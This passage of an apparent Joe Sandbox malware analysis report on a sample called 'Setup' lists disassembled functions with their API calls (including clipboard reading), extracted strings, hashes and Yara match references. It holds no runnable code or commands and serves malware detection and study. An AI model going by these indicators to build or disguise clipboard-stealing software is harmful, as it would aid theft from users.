Opcode ID: d7c4a0f52cab13a45199a0aa4645556fa00b4e8be2889fd520fd709c7b4ed797
Instruction ID: e0b5b3a37fa94c07bd3505a9d82f6f98f39d7660fc33ce025678b109bad6cab9
Opcode Fuzzy Hash: d7c4a0f52cab13a45199a0aa4645556fa00b4e8be2889fd520fd709c7b4ed797
Instruction Fuzzy Hash: 0FF07AB45093428FE324EF25D1A875ABBF5BB84308F01891DE4998B390C7B59549CF82

Function 031DC740 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 031DC753

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 8726ddf771df52467cbc7d510e064b338955b76a5180f7fed299505b927203a7
Instruction ID: 89677a03f15b14130e54a2749996ad059d45db0b06dde60c8c7c6a64c421312c
Opcode Fuzzy Hash: 8726ddf771df52467cbc7d510e064b338955b76a5180f7fed299505b927203a7
Instruction Fuzzy Hash: C0D05E216A41047BD2107558BD4AF533768A702715F404215B766D65C6EE607924C672

Function 032087B0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,031F063A,?,?,?,?,?,?,?,?,?,?,?), ref: 032087C0

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e712710ecf652a392005e91def68567c9d36674d896be12e3d61a8047157d679
Instruction ID: ac6ea56cd7441ef1e82c79b607e3f52a47234551d39b8323bfe8690f61b0ea60
Opcode Fuzzy Hash: e712710ecf652a392005e91def68567c9d36674d896be12e3d61a8047157d679
Instruction Fuzzy Hash: 99C04C31055120AAC6206A14FC08F867A659F59260F018051F404661B5C6B0AC818A94

Function 032087E3 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 032087EE

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7dd81eb80cc48e41daeec7dc32cd3ad86f8a8fc1de5995c0bc683b6305ff330a
Instruction ID: 21fb19e1447bc82d85bfe64d60ae4af21aeafcfd4c26da112bb2581a8aa8b276
Opcode Fuzzy Hash: 7dd81eb80cc48e41daeec7dc32cd3ad86f8a8fc1de5995c0bc683b6305ff330a
Instruction Fuzzy Hash: 16B01231041110BBC6303B10BC0CFC63E20DB60610F014040F0005C0F5C670A881CAC4

Non-executed Functions

Function 03203821 Relevance: 80.4, Strings: 64, Instructions: 372COMMON

Download Yara Rule

Strings

`, xrefs: 03203AAA
b, xrefs: 03203AB8
n, xrefs: 03203CE3
\, xrefs: 03203BDE
L, xrefs: 03203B6E
F, xrefs: 03203BB4
;, xrefs: 03203999
i, xrefs: 032038AB
p, xrefs: 03203B1A
K, xrefs: 032038C7
M, xrefs: 03203CCB
I, xrefs: 03203CDB
X, xrefs: 03203BC2
), xrefs: 03203A09
=, xrefs: 03203A33
N, xrefs: 03203B7C
z, xrefs: 03203AF0
9, xrefs: 03203849
B, xrefs: 03203B98
h, xrefs: 03203A72
., xrefs: 032039A7
R, xrefs: 03203857
x, xrefs: 03203AE2
t, xrefs: 03203B36
x, xrefs: 0320383B
j, xrefs: 03203A80
y, xrefs: 032039D1
B, xrefs: 032039B5
b, xrefs: 03203865
f, xrefs: 03203AD4
n, xrefs: 03203A9C
Z, xrefs: 03203BD0
*, xrefs: 03203A4F
d, xrefs: 03203AC6
v, xrefs: 03203B44
D, xrefs: 03203BA6
d, xrefs: 0320388F
t, xrefs: 0320389D
1, xrefs: 03203881
~, xrefs: 03203B0C
@, xrefs: 03203B8A
H, xrefs: 03203B52
A, xrefs: 032038F1
L, xrefs: 03203CD3
[, xrefs: 03203BD7
9, xrefs: 03203DBB
$, xrefs: 03203A41
|, xrefs: 03203AFE
@, xrefs: 032039DF
j, xrefs: 03203873
l, xrefs: 03203A8E
LKJI, xrefs: 03203E28
/, xrefs: 03203A17
}, xrefs: 03203A25
r, xrefs: 03203B28
7, xrefs: 032039ED
), xrefs: 03203A5D
C, xrefs: 03203CC3
^, xrefs: 03203CBB
Y, xrefs: 03203929
4, xrefs: 03203D99
3, xrefs: 03203A6B
], xrefs: 03203945
J, xrefs: 03203B60

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: $$)$)$*$.$/$1$3$4$7$9$9$;$=$@$@$A$B$B$C$D$F$H$I$J$K$L$L$LKJI$M$N$R$X$Y$Z$[$\$]$^$`$b$b$d$d$f$h$i$j$j$l$n$n$p$r$t$t$v$x$x$y$z$|$}$~
API String ID: 0-2684223533
Opcode ID: 33b2c035103f99fd86c74ffad5e4950f88fff6f2349b81ebdc6e6e8235d184c9
Instruction ID: d4f82f626e4c8ee0db7ec02f8da274d7de3a336fc62a7772027660c9742f2ec9
Opcode Fuzzy Hash: 33b2c035103f99fd86c74ffad5e4950f88fff6f2349b81ebdc6e6e8235d184c9
Instruction Fuzzy Hash: A52231219087EA8DDB32C63C8C087DDBE715B27224F0843D9D1E96B2D2D7B50B85CB66

Function 00FB504D Relevance: 80.4, Strings: 64, Instructions: 372COMMON

Download Yara Rule

Strings

N, xrefs: 00FB53A8
v, xrefs: 00FB5370
@, xrefs: 00FB520B
J, xrefs: 00FB538C
9, xrefs: 00FB5075
4, xrefs: 00FB55C5
b, xrefs: 00FB52E4
L, xrefs: 00FB539A
I, xrefs: 00FB5507
y, xrefs: 00FB51FD
), xrefs: 00FB5235
r, xrefs: 00FB5354
M, xrefs: 00FB54F7
*, xrefs: 00FB527B
B, xrefs: 00FB53C4
Z, xrefs: 00FB53FC
i, xrefs: 00FB50D7
9, xrefs: 00FB55E7
b, xrefs: 00FB5091
z, xrefs: 00FB531C
d, xrefs: 00FB50BB
d, xrefs: 00FB52F2
), xrefs: 00FB5289
X, xrefs: 00FB53EE
D, xrefs: 00FB53D2
., xrefs: 00FB51D3
;, xrefs: 00FB51C5
[, xrefs: 00FB5403
=, xrefs: 00FB525F
j, xrefs: 00FB509F
A, xrefs: 00FB511D
L, xrefs: 00FB54FF
], xrefs: 00FB5171
7, xrefs: 00FB5219
t, xrefs: 00FB5362
|, xrefs: 00FB532A
C, xrefs: 00FB54EF
1, xrefs: 00FB50AD
F, xrefs: 00FB53E0
R, xrefs: 00FB5083
h, xrefs: 00FB529E
\, xrefs: 00FB540A
p, xrefs: 00FB5346
^, xrefs: 00FB54E7
@, xrefs: 00FB53B6
}, xrefs: 00FB5251
x, xrefs: 00FB530E
$, xrefs: 00FB526D
`, xrefs: 00FB52D6
j, xrefs: 00FB52AC
/, xrefs: 00FB5243
l, xrefs: 00FB52BA
Y, xrefs: 00FB5155
x, xrefs: 00FB5067
t, xrefs: 00FB50C9
3, xrefs: 00FB5297
~, xrefs: 00FB5338
f, xrefs: 00FB5300
H, xrefs: 00FB537E
K, xrefs: 00FB50F3
LKJI, xrefs: 00FB5654
n, xrefs: 00FB550F
B, xrefs: 00FB51E1
n, xrefs: 00FB52C8

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: $$)$)$*$.$/$1$3$4$7$9$9$;$=$@$@$A$B$B$C$D$F$H$I$J$K$L$L$LKJI$M$N$R$X$Y$Z$[$\$]$^$`$b$b$d$d$f$h$i$j$j$l$n$n$p$r$t$t$v$x$x$y$z$|$}$~
API String ID: 0-2684223533
Opcode ID: 8e8bf7b6e4afc31ae7a8d892defdd8308e3a6390efeb5b60dc72ccb8a9722708
Instruction ID: 82a9f2895af6084942f07beb895f3088d91f20f3224da5bf57bf60e0eecffd42
Opcode Fuzzy Hash: 8e8bf7b6e4afc31ae7a8d892defdd8308e3a6390efeb5b60dc72ccb8a9722708
Instruction Fuzzy Hash: 22222E219087EA89DB32C63C8C187DDBE715B27324F0843D9D1E96B2D2D7B50A85CB66

Function 03201070 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 111clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 03201080
GetClipboardData.USER32 ref: 032010A1
GlobalLock.KERNEL32 ref: 032010BC
GlobalUnlock.KERNEL32 ref: 032011D3
CloseClipboard.USER32 ref: 032011DC

Strings

c, xrefs: 0320113F
}, xrefs: 03201144
p, xrefs: 0320113A
a, xrefs: 03201153
m, xrefs: 03201167
r, xrefs: 03201130
v, xrefs: 03201135
P, xrefs: 03201162
v, xrefs: 0320114E
b, xrefs: 03201149
s, xrefs: 0320115D

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID: P$a$b$c$m$p$r$s$v$v$}
API String ID: 1006321803-2105936040
Opcode ID: 6344cde628dc4a1649b9744def6d01e1e34f4a78935293dfeb59b7a4169b84cd
Instruction ID: fbd8b2cd6c2e3f36e31a5380aa1319fe8ffbf85fe5e75b12b7340025037e9608
Opcode Fuzzy Hash: 6344cde628dc4a1649b9744def6d01e1e34f4a78935293dfeb59b7a4169b84cd
Instruction Fuzzy Hash: 06419D7151C3818ED304EF78C54835FBFE0AB96308F08496DE8D986282D2B9959CC7A3

Function 031F30B0 Relevance: 29.2, Strings: 23, Instructions: 455COMMON

Download Yara Rule

Strings

_A, xrefs: 031F3331
O-K/, xrefs: 031F37D7
MO, xrefs: 031F342B
b3e5, xrefs: 031F34A3
Au5w, xrefs: 031F388B
t#s%, xrefs: 031F34CB
x;n=, xrefs: 031F34B7
0mWo, xrefs: 031F3877
=U:W, xrefs: 031F383B
f7l9, xrefs: 031F34AD
)*, xrefs: 031F3B3E
+E)G, xrefs: 031F3813
4A.C, xrefs: 031F3809
t+v, xrefs: 031F359E
?Q4S, xrefs: 031F3831
T!~#, xrefs: 031F37B9
>y<{, xrefs: 031F3895
N)C+, xrefs: 031F37CD
CqEs, xrefs: 031F3881
=Y)[, xrefs: 031F3845
s=K?, xrefs: 031F37FF
*+, xrefs: 031F34DF
k%@', xrefs: 031F37C3

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: t+v$)*$*+$+E)G$0mWo$4A.C$=U:W$=Y)[$>y<{$?Q4S$Au5w$CqEs$MO$N)C+$O-K/$T!~#$b3e5$f7l9$k%@'$s=K?$t#s%$x;n=$_A
API String ID: 0-2213112349
Opcode ID: 9e0b2cb228e0cc35653e775d3186f8fdd533e0e0023f30f10379bc3d3acac15e
Instruction ID: 88d3a165c083ee83dfe6f99f613a989b3bdff7b2915629e439fc1654d8dcd31e
Opcode Fuzzy Hash: 9e0b2cb228e0cc35653e775d3186f8fdd533e0e0023f30f10379bc3d3acac15e
Instruction Fuzzy Hash: 63421CB5D0926D8ACBA5DF16894039DBAB1FB44700F25D6E8C49D7B248CF795A82CFC0

Function 00FA48DC Relevance: 29.2, Strings: 23, Instructions: 455COMMON

Download Yara Rule

Strings

_A, xrefs: 00FA4B5D
O-K/, xrefs: 00FA5003
t+v, xrefs: 00FA4DCA
=Y)[, xrefs: 00FA5071
4A.C, xrefs: 00FA5035
N)C+, xrefs: 00FA4FF9
CqEs, xrefs: 00FA50AD
s=K?, xrefs: 00FA502B
b3e5, xrefs: 00FA4CCF
>y<{, xrefs: 00FA50C1
T!~#, xrefs: 00FA4FE5
+E)G, xrefs: 00FA503F
Au5w, xrefs: 00FA50B7
f7l9, xrefs: 00FA4CD9
=U:W, xrefs: 00FA5067
x;n=, xrefs: 00FA4CE3
)*, xrefs: 00FA536A
k%@', xrefs: 00FA4FEF
?Q4S, xrefs: 00FA505D
MO, xrefs: 00FA4C57
*+, xrefs: 00FA4D0B
t#s%, xrefs: 00FA4CF7
0mWo, xrefs: 00FA50A3

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: t+v$)*$*+$+E)G$0mWo$4A.C$=U:W$=Y)[$>y<{$?Q4S$Au5w$CqEs$MO$N)C+$O-K/$T!~#$b3e5$f7l9$k%@'$s=K?$t#s%$x;n=$_A
API String ID: 0-2213112349
Opcode ID: 0259f717ecf1a5fbf392b0d04b0a5f6626a938fd807ae921046bb65c5b61ea4b
Instruction ID: 8d5c7438f6a8babce0a72335b2dfe7a28f5752f150a368945ec15d0bed059dae
Opcode Fuzzy Hash: 0259f717ecf1a5fbf392b0d04b0a5f6626a938fd807ae921046bb65c5b61ea4b
Instruction Fuzzy Hash: 3B421CB5D0926D8ACBA4DF16984039DBAB1FB40700F25D2E8C49D7B248CF795A82CFC0

Function 031E9620 Relevance: 15.5, APIs: 2, Strings: 6, Instructions: 1469COMMON

Download Yara Rule

APIs

Part of subcall function 0320A0F0: LdrInitializeThunk.NTDLL(0320C30B,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0320A11E

FreeLibrary.KERNEL32(?), ref: 031E9CDA
FreeLibrary.KERNEL32(?), ref: 031E9D6B

Strings

JK, xrefs: 031E9A3C
*G$I, xrefs: 031E9A34
LKJI, xrefs: 031E9650
lC E, xrefs: 031E9A2C
LKJI, xrefs: 031EA525
LKJI, xrefs: 031E9BA0

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: *G$I$JK$LKJI$LKJI$LKJI$lC E
API String ID: 764372645-1846479541
Opcode ID: 3240f048d02852e4cacceb8934acbb098f083f4658de9f270d8aa4cdc6d5dd76
Instruction ID: 6f84dcc5d106a3a67935271310e973cad6582d4a5ee3a1dc65029ffce0337526
Opcode Fuzzy Hash: 3240f048d02852e4cacceb8934acbb098f083f4658de9f270d8aa4cdc6d5dd76
Instruction Fuzzy Hash: D4A232766187409FD724CF24C884A6ABBE3EFD9300F1DC86CE5859B256DB72A845CB81

Function 00FB6E9C Relevance: 15.3, Strings: 12, Instructions: 262COMMON

Download Yara Rule

Strings

I, xrefs: 00FB7039
K, xrefs: 00FB702F
I, xrefs: 00FB7151
I, xrefs: 00FB6F3F
L, xrefs: 00FB6F30
K, xrefs: 00FB7147
L, xrefs: 00FB7142
K, xrefs: 00FB6F35
J, xrefs: 00FB6F3A
L, xrefs: 00FB702A
J, xrefs: 00FB714C
J, xrefs: 00FB7034

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: I$I$I$J$J$J$K$K$K$L$L$L
API String ID: 0-2736399220
Opcode ID: d49b88ee4eee389bd5fc382c15596c884e7bd027ae630d988f0cf46665355d18
Instruction ID: fac6d768698434bd1ea7d2d17a3c92bfc46634169a0bee354776728ef582757c
Opcode Fuzzy Hash: d49b88ee4eee389bd5fc382c15596c884e7bd027ae630d988f0cf46665355d18
Instruction Fuzzy Hash: 5CA1487260C3808FD304DB2DC8503AEBBD29BD6314F1D8A6DE4D697382D679C945AB1B

Function 03205110 Relevance: 12.7, Strings: 10, Instructions: 215COMMON

Download Yara Rule

Strings

~, xrefs: 0320519D
c2.), xrefs: 032051B3
c2.), xrefs: 0320513E
}, xrefs: 03205123
|, xrefs: 0320511E
c2.), xrefs: 03205145
}, xrefs: 03205198
~, xrefs: 03205128
c2.), xrefs: 032051BA
|, xrefs: 03205193

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: c2.)$c2.)$c2.)$c2.)$|$|$}$}$~$~
API String ID: 0-1144048153
Opcode ID: d485fb3b6af506a1c47aef30a555c2cf9392bf1476e19ad3fe4f9f4cf07560ac
Instruction ID: 58237291ae2b72ff32a56ef304d1947dc04c7a2846ed908f383e016eb6351c0c
Opcode Fuzzy Hash: d485fb3b6af506a1c47aef30a555c2cf9392bf1476e19ad3fe4f9f4cf07560ac
Instruction Fuzzy Hash: 6571D02262C7C18AD745C63C885826FEED20BE7124F2CCAADE4E6873D7C565C54AC763

Function 00FB693C Relevance: 12.7, Strings: 10, Instructions: 215COMMON

Download Yara Rule

Strings

|, xrefs: 00FB69BF
}, xrefs: 00FB69C4
c2.), xrefs: 00FB69E6
c2.), xrefs: 00FB69DF
~, xrefs: 00FB6954
|, xrefs: 00FB694A
~, xrefs: 00FB69C9
c2.), xrefs: 00FB696A
}, xrefs: 00FB694F
c2.), xrefs: 00FB6971

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: c2.)$c2.)$c2.)$c2.)$|$|$}$}$~$~
API String ID: 0-1144048153
Opcode ID: d485fb3b6af506a1c47aef30a555c2cf9392bf1476e19ad3fe4f9f4cf07560ac
Instruction ID: feea089f74de783bed57b470494543279a402180da2cc4410c47b1ff20fc0d54
Opcode Fuzzy Hash: d485fb3b6af506a1c47aef30a555c2cf9392bf1476e19ad3fe4f9f4cf07560ac
Instruction Fuzzy Hash: C271F21260C3C14AD705863D89542AFAED21BE7234F2CCAADE0E6C73D6D529C5069763

Function 032043ED Relevance: 12.7, Strings: 10, Instructions: 187COMMON

Download Yara Rule

Strings

&, xrefs: 03204405
B, xrefs: 03204419
LKJI, xrefs: 0320459F
8, xrefs: 03204429
a, xrefs: 03204542
$, xrefs: 032043FD
0, xrefs: 03204524
`, xrefs: 0320453E
C, xrefs: 03204421
G, xrefs: 03204411

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: $$&$0$8$B$C$G$LKJI$`$a
API String ID: 0-1761522954
Opcode ID: 5f51b4e80c58d8491a70e56706d153e8de2fc151a60d9911bef5b666a692bc6c
Instruction ID: e54b23cdbfb74c47f76701e56bcaef5224de8503b09f9653c17a026a0a0b7421
Opcode Fuzzy Hash: 5f51b4e80c58d8491a70e56706d153e8de2fc151a60d9911bef5b666a692bc6c
Instruction Fuzzy Hash: 0F812532D183D88FDB12CBB8C8543DDBFB26B56310F0882D9C595AB3C6DA744A89CB51

Function 00FB5C19 Relevance: 12.7, Strings: 10, Instructions: 187COMMON

Download Yara Rule

Strings

a, xrefs: 00FB5D6E
&, xrefs: 00FB5C31
B, xrefs: 00FB5C45
`, xrefs: 00FB5D6A
$, xrefs: 00FB5C29
8, xrefs: 00FB5C55
LKJI, xrefs: 00FB5DCB
C, xrefs: 00FB5C4D
G, xrefs: 00FB5C3D
0, xrefs: 00FB5D50

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: $$&$0$8$B$C$G$LKJI$`$a
API String ID: 0-1761522954
Opcode ID: 0ce8fa78f478918c8e8b6b1a00e2881cd8c0190354c2b6b48c38b0668c5ed414
Instruction ID: cb324fce43f8c185317d87c463a96a03506617ec95311f804d23343eed3bf7a1
Opcode Fuzzy Hash: 0ce8fa78f478918c8e8b6b1a00e2881cd8c0190354c2b6b48c38b0668c5ed414
Instruction Fuzzy Hash: D7812632D087E88FDB12CB78C8543DDBFB26B56310F0846E9C495AB3D6CA784A45CB55

Function 031D90A0 Relevance: 11.7, Strings: 9, Instructions: 450COMMON

Download Yara Rule

Strings

=WQQ, xrefs: 031D90FB
WN, xrefs: 031D9103
@[AD, xrefs: 031D90E3
b, xrefs: 031D93F7
jUUX, xrefs: 031D94F0
M[XD, xrefs: 031D90DB
WLR+, xrefs: 031D90F3
sumk, xrefs: 031D945B
jUUX, xrefs: 031D9115

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: =WQQ$@[AD$M[XD$WLR+$WN$b$jUUX$jUUX$sumk
API String ID: 0-1302826949
Opcode ID: d4b07d2b4aedff03e6feb5c3e5c9871842d32888d13d809aebe9e9dc19282036
Instruction ID: d877a824da6ecaecbbf9df4931367219afeebebb6bc463fc494e5170207984af
Opcode Fuzzy Hash: d4b07d2b4aedff03e6feb5c3e5c9871842d32888d13d809aebe9e9dc19282036
Instruction Fuzzy Hash: 62D1F47164C7918BC322CF79885066BFFE1AF9B214F0C49ADE4E58B382D729C509C796

Function 00F8A8CC Relevance: 11.7, Strings: 9, Instructions: 450COMMON

Download Yara Rule

Strings

jUUX, xrefs: 00F8A941
WLR+, xrefs: 00F8A91F
=WQQ, xrefs: 00F8A927
M[XD, xrefs: 00F8A907
@[AD, xrefs: 00F8A90F
jUUX, xrefs: 00F8AD1C
sumk, xrefs: 00F8AC87
b, xrefs: 00F8AC23
WN, xrefs: 00F8A92F

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: =WQQ$@[AD$M[XD$WLR+$WN$b$jUUX$jUUX$sumk
API String ID: 0-1302826949
Opcode ID: d4b07d2b4aedff03e6feb5c3e5c9871842d32888d13d809aebe9e9dc19282036
Instruction ID: 9f1888e5aa04754519ed000441edd487638c343e7e3d7bea54eed7ebbfcfe58b
Opcode Fuzzy Hash: d4b07d2b4aedff03e6feb5c3e5c9871842d32888d13d809aebe9e9dc19282036
Instruction Fuzzy Hash: 1FD1253160C7918BD326DF7988503ABFFE19F93210F0849ADE4E58B342D229C909D797

Function 031EF27C Relevance: 10.9, Strings: 8, Instructions: 927COMMON

Download Yara Rule

Strings

%J8L, xrefs: 031EF8F9
9N0@, xrefs: 031EF903
5Z?\, xrefs: 031EF921
8^9P, xrefs: 031EF92B
0R&T, xrefs: 031EF935
3B"D, xrefs: 031EF90D
)V#h, xrefs: 031EF93F
"F"X, xrefs: 031EF917

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: "F"X$%J8L$)V#h$0R&T$3B"D$5Z?\$8^9P$9N0@
API String ID: 0-4188904333
Opcode ID: 2ef428983c52ccb2eb9ed0d46fb7cb48d5c21cd797d0c100ffb23eff3660e8f7
Instruction ID: 8f1a9fa8a58f7a9f784301c0222ac9dfb670b76e1ea13762ee074132f65519df
Opcode Fuzzy Hash: 2ef428983c52ccb2eb9ed0d46fb7cb48d5c21cd797d0c100ffb23eff3660e8f7
Instruction Fuzzy Hash: ED523771A006158BCB24CF69CC923ABB7B2FF89310F19916CD856AF394E7799942CB50

Function 00FA0AA8 Relevance: 10.9, Strings: 8, Instructions: 927COMMON

Download Yara Rule

Strings

9N0@, xrefs: 00FA112F
%J8L, xrefs: 00FA1125
0R&T, xrefs: 00FA1161
"F"X, xrefs: 00FA1143
8^9P, xrefs: 00FA1157
5Z?\, xrefs: 00FA114D
3B"D, xrefs: 00FA1139
)V#h, xrefs: 00FA116B

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "F"X$%J8L$)V#h$0R&T$3B"D$5Z?\$8^9P$9N0@
API String ID: 0-4188904333
Opcode ID: c435fb983e23c354d5be12c14e6e57d1b71bcdcf551c90d91318eede61e7c560
Instruction ID: 73fd4b10eca5530884a113997a1084c8037604ef0a1f18d7afaccdd0271390c6
Opcode Fuzzy Hash: c435fb983e23c354d5be12c14e6e57d1b71bcdcf551c90d91318eede61e7c560
Instruction Fuzzy Hash: A55236B1E002158BCF24CF69CC923AAB7B2FF96310F19816CD456AF394EB789941DB54

Function 00FB721C Relevance: 9.4, Strings: 7, Instructions: 656COMMON

Download Yara Rule

Strings

x%, xrefs: 00FB73AF
R3^5, xrefs: 00FB7583
7(, xrefs: 00FB76BC
s?@!, xrefs: 00FB759B
V7~9, xrefs: 00FB758B
DMNO, xrefs: 00FB7274, 00FB731D
`abc, xrefs: 00FB7962

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 7($DMNO$R3^5$V7~9$`abc$s?@!$x%
API String ID: 0-1090096584
Opcode ID: f0ec123f78e23968314f524798a3af57e1d276734670c96e7b33b6e7ce64240a
Instruction ID: a4647f9158a422b97c46c50013defc133214c8cae4ab7847ac8937e6551d2025
Opcode Fuzzy Hash: f0ec123f78e23968314f524798a3af57e1d276734670c96e7b33b6e7ce64240a
Instruction Fuzzy Hash: CA220572A483019FD314DF65CC84BABBBE6EFC5310F28892CF5958B291DA74D805CB56

Function 00F9AE4C Relevance: 9.0, Strings: 6, Instructions: 1469COMMON

Download Yara Rule

Strings

LKJI, xrefs: 00F9B3CC
LKJI, xrefs: 00F9BD51
lC E, xrefs: 00F9B258
*G$I, xrefs: 00F9B260
LKJI, xrefs: 00F9AE7C
JK, xrefs: 00F9B268

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: *G$I$JK$LKJI$LKJI$LKJI$lC E
API String ID: 0-1846479541
Opcode ID: 05c5505df2c127189b4220558efd9c6a6b5e11093dc94cf73b5a68ce34b04f3e
Instruction ID: 0ed6d92d085bac79d0ebee7bc89137a277b4b0d49f822d66a9ff6997b5ecc027
Opcode Fuzzy Hash: 05c5505df2c127189b4220558efd9c6a6b5e11093dc94cf73b5a68ce34b04f3e
Instruction Fuzzy Hash: 5CA23636A083019FEB24CF24DD84B6AB7E2EBD1310F19C96CE5859B256DB71EC05DB81

Function 031ED940 Relevance: 8.4, Strings: 6, Instructions: 870COMMON

Download Yara Rule

Strings

N, xrefs: 031EDFEC
705, xrefs: 031EE05C
EC, xrefs: 031EDC58
;6=2, xrefs: 031EDCF6
F, xrefs: 031EDB5E
..70, xrefs: 031EDD0C

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: 705$..70$;6=2$EC$F$N
API String ID: 0-1390691857
Opcode ID: b23ccdfe3eef96f68790e82fd44df0de689ca24420f6f44d65a08015b0b23e9d
Instruction ID: 240b5a4eec5a019472eebf4c1297e51851dcc7c13c9bc9b231b6d225315dc7be
Opcode Fuzzy Hash: b23ccdfe3eef96f68790e82fd44df0de689ca24420f6f44d65a08015b0b23e9d
Instruction Fuzzy Hash: E252467550C7908FC725CF28D85066FBBE2AFD9214F1D8A6CE8E44B392D7728905CB92

Function 00F9F16C Relevance: 8.4, Strings: 6, Instructions: 870COMMON

Download Yara Rule

Strings

;6=2, xrefs: 00F9F522
705, xrefs: 00F9F888
..70, xrefs: 00F9F538
F, xrefs: 00F9F38A
